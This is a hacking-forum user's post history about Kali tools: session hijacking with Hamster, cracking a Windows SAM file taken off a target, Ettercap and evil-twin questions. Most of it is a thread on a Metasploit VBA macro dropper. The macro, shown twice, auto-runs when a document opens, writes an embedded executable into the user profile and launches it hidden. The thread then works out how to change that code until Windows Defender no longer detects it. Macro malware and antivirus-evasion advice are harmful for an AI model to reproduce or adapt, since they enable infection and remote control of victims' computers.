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Beginner's Corner / Re: Hamster error in Kali
« on: November 11, 2015, 02:46:02 AM »
Thanks a ton for looking into this for me. I have started learning a bit about linux and I'm working through the advanced pentesting course on I've completed the basic course but obviously a bunch of videos isn't going to make me an expert so I'm trying to get as much practice in the material as possible. This is one of the few things I actually enjoy learning about.

Beginner's Corner / Re: Hamster error in Kali
« on: November 10, 2015, 02:01:10 AM »
This may provide an accurate description of the problem:

The page says the bug is fixed, however I am obviously still experiencing it. I have updated anything and everything with apt-get update and apt-get upgrade

Beginner's Corner / Re: Hamster error in Kali
« on: November 09, 2015, 12:57:27 AM »
I did look, and the file isn't there. But when I try to simply copy the ferret script over it still doesn't recognize it.

Beginner's Corner / Hamster error in Kali
« on: October 27, 2015, 02:41:42 AM »
So I'm trying to learn how to use hamster in Kali 1.1, but there's a small problem. The program relies on ferret and anytime I specify my network interface I get the below error:

execle(ferret): No such file or directory

I've tried googling around but I've yet to see a clear fix, does anyone know what I need to do?

Thanks in advanced.

Tutorials / Re: Ettercap MITM
« on: October 02, 2015, 10:28:19 PM »
Yes it works. I do it similarly. But sometimes the antivirus or browser of the victim detects that something is wrong with certificate when browsing https sites.

Yeah, the newest versions of Chrome, Firefox and even IE detect this right away.

Hacking and Security / Re: Odd Ophcrack Error
« on: September 21, 2015, 12:57:37 PM »
What commands are you using?

I'm just simply giving the files to the GUI, I tried using the terminal command as well and got the same error.

Hacking and Security / Odd Ophcrack Error
« on: September 18, 2015, 10:57:43 PM »
So I have a SAM and SYSTEM file pair I'm trying to crack, I got the files off the target computer, and moved them to my Kali VM. However, upon selecting the folder with the two files, Ophcrack gives the error: "A problem occured while reading the SYSTEM file found in ."

Has anyone ever encountered this error or have any idea what may have caused it?

Thanks in advanced for responding

Yeah, I figured. It just seemed odd to me that such a small change would throw it off but hey if it works... Here's the new code:
Sub boo()'' boo Macro''Sub Auto_Open()    Quvyt12End Sub
Sub Quvyt12()    Dim Quvyt7 As Integer    Dim Quvyt1 As String    Dim Quvyt2 As String    Dim Quvyt3 As Integer    Dim Quvyt4 As Paragraph    Dim Quvyt8 As Integer    Dim Quvyt9 As Boolean    Dim Quvyt5 As Integer    Dim Quvyt11 As String    Dim Quvyt6 As Byte    Dim Zdeovterfr As String    Dim trigger As Boolean    Dim length As Integer    length = Len(Quvyt11)        Zdeovterfr = "Zdeovterfr"    Quvyt1 = "AAKTrgfLVgU.exe"    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt3 = FreeFile()    Open Quvyt1 For Binary As Quvyt3
    For Each Quvyt4 In ActiveDocument.Paragraphs        DoEvents            Quvyt11 = Quvyt4.Range.Text        If (Quvyt9 = True) Then            Quvyt8 = 1            While (Quvyt8 < Len(Quvyt11))                Quvyt6 = Mid(Quvyt11, Quvyt8, 4)                Put #Quvyt3, , Quvyt6                Quvyt8 = Quvyt8 + 4            Wend'here's the issue        ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And length > 0) Then            Quvyt9 = True        End If'End issue    Next    Close #Quvyt3    Quvyt13 (Quvyt1)
End Sub
Sub Quvyt13(Quvyt10 As String)    Dim Quvyt7 As Integer    Dim Quvyt2 As String    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt7 = Shell("AAKTrgfLVgU.exe", vbHide)End Sub
Sub AutoOpen()    Auto_OpenEnd Sub
Sub Workbook_Open()    Auto_OpenEnd Sub

End Sub
PS I know the trigger variable is initialized but not used, I was going to try something else but I didn't need to :D

Actually I would have suggested to deal with the Windows Defender problem, but by now I think you benefit more by trying to understand that code first.
How much do you know about programming, though?
The formatting is the first thing you should do. That you feel the need to get suggestions for formatting tells me that you don't understand the basic structure of this code.
So far you have problems with seeing where subprocedures start and end, otherwise you would not stumble over the definition of Quvyt10.

You also confuse the terms definition and initialization. Please get these terms straight or it will be very hard to communicate.
Where you say "Quvyt1 actually has been defined as this" you meant initialized with the value "AAKTrgfLVgU.exe".

Look up the basic structures of VB first: initialization, definition, procedures, procedure calls, if-else statements and loops. Do that so that you are able to identify them if you see them. A beginners tutorials should be enough.
Then you create the formatting yourself, based on what you know how these structures look like, because good formatting is nothing more than visually separating statements and structures from each other.

After you have done that, you can see if your understanding of the code got any better and try to modify it again.
Or post here if there are still questions.
I've spent some time looking into it, and I get the jist of what the code is doing now. I don't need to reformat anything because by initializing the length variable and calling it as a replacement for Len(Quvyt10) has managed to keep Windows Defender off of it for some reason. Now I simply need to know what the error is about. I looked up microsofts help file related to the error and it talked about the whole invalid argument thing, making me think this gibberish.exe file that's being called isn't anywhere to be found. What I don't understand is where this exe file would be, or if this code is supposed to create it or if it's supposed to have been read from the payload code in the document itself.

You can test which part windows defender starts bitching about,  a very stupid way to do this is to cut the code in half and test both parts, keep doing the latter until you found the part that is detected and try reformatting it.
There are members that know more about AV detection than I do but in case it detects behaviour instead of fingerprints this won't work.
Ok I tested it and I was able to narrow it down to this part:
 ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And Len(Quvyt11) > 0) Then            Quvyt9 = True        End If

if I take that part out, Windows Defender doesn't bat an eye, but if it's in there it's fricking Armageddon... I honestly don't know where to begin with Visual Basic in terms of programming. It looks semi self explanatory and I might try messing around with it but does anyone have any reformatting suggestions?

EDIT: Somehow I got it past Windows defender by making a new integer variable set as the value of the length of Quvyt11, however now opening the file gives the error "Invalid procedure call or argument" and the debugger points to this line:

Quvyt7 = Shell(Quvyt10, vbHide)

I think it may have something to do with Quvyt10="AAKTrgfLVgU.exe". The only way I know that though is when visual basic tells me that when I hover over the variable with my cursor. Nowhere in the code is Quvty10 used again except for  "Sub Quvyt13(Quvyt10 As String)" which makes me wonder if Quvyt10 has even been correctly defined. Quvyt1 actually has been defined as this but not Quvyt10... I think something is getting confused there.

So I'm trying to follow the metasploit unleashed tutorial here: about vbscript infection. I copied the payload into a word document, but when I try to save the macro, windows defender detects it immediately and it's game over. Long story short, for some reason windows defender doesn't detect me as admin so I can't turn it off. But even if it did, I need this macro to get past windows defender. How could this code be changed so that defender might not detect it so easily?
Code: [Select]
Sub moo()'' moo Macro''Sub Auto_Open()    Quvyt12End Sub
Sub Quvyt12()    Dim Quvyt7 As Integer    Dim Quvyt1 As String    Dim Quvyt2 As String    Dim Quvyt3 As Integer    Dim Quvyt4 As Paragraph    Dim Quvyt8 As Integer    Dim Quvyt9 As Boolean    Dim Quvyt5 As Integer    Dim Quvyt11 As String    Dim Quvyt6 As Byte    Dim Zdeovterfr As String    Zdeovterfr = "Zdeovterfr"    Quvyt1 = "AAKTrgfLVgU.exe"    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt3 = FreeFile()    Open Quvyt1 For Binary As Quvyt3    For Each Quvyt4 In ActiveDocument.Paragraphs        DoEvents            Quvyt11 = Quvyt4.Range.Text        If (Quvyt9 = True) Then            Quvyt8 = 1            While (Quvyt8 < Len(Quvyt11))                Quvyt6 = Mid(Quvyt11, Quvyt8, 4)                Put #Quvyt3, , Quvyt6                Quvyt8 = Quvyt8 + 4            Wend        ElseIf (InStr(1, Quvyt11, Zdeovterfr) > 0 And Len(Quvyt11) > 0) Then            Quvyt9 = True        End If    Next    Close #Quvyt3    Quvyt13 (Quvyt1)End Sub
Sub Quvyt13(Quvyt10 As String)    Dim Quvyt7 As Integer    Dim Quvyt2 As String    Quvyt2 = Environ("USERPROFILE")    ChDrive (Quvyt2)    ChDir (Quvyt2)    Quvyt7 = Shell(Quvyt10, vbHide)End Sub
Sub AutoOpen()    Auto_OpenEnd Sub
Sub Workbook_Open()    Auto_OpenEnd Sub
End Sub

Sorry for this god-awful formatting. I'm stumped on that too.

Hardware / Recommended Kali Laptops?
« on: August 20, 2015, 04:04:40 PM »
So I've been running Kali as a VM on my main rig and on an old dinosaur in my basement as the main OS, but there are a LOT of things that require portability that I simply don't have right now. Does anyone have any recommendations for a laptop (new or used) that wouldn't break the bank ($500 USD or less) that I could dual boot Kali and Windows on?

Beginner's Corner / Executing a meterpreter shell via excel file
« on: August 18, 2015, 03:46:21 PM »
So I just recently successfully used metasploit to create the windows/reverse_tcp payload. I was curious if there was anyway to (and excuse my lack of proper termonology) "bundle" the payload with an excel file in such a way that when the excel file is opened, the payload is executed? I've heard about attacks involving malicious macros but I was having a tough time finding anything on how to do it.

Thanks in advance

Beginner's Corner / Re: EvilTwin AP Question
« on: August 17, 2015, 12:02:01 AM »
Do you know anything about the router? Brand name, model number, ect? Then at least if you don't have a logo you could design one or just use the brand and model or whatnot.

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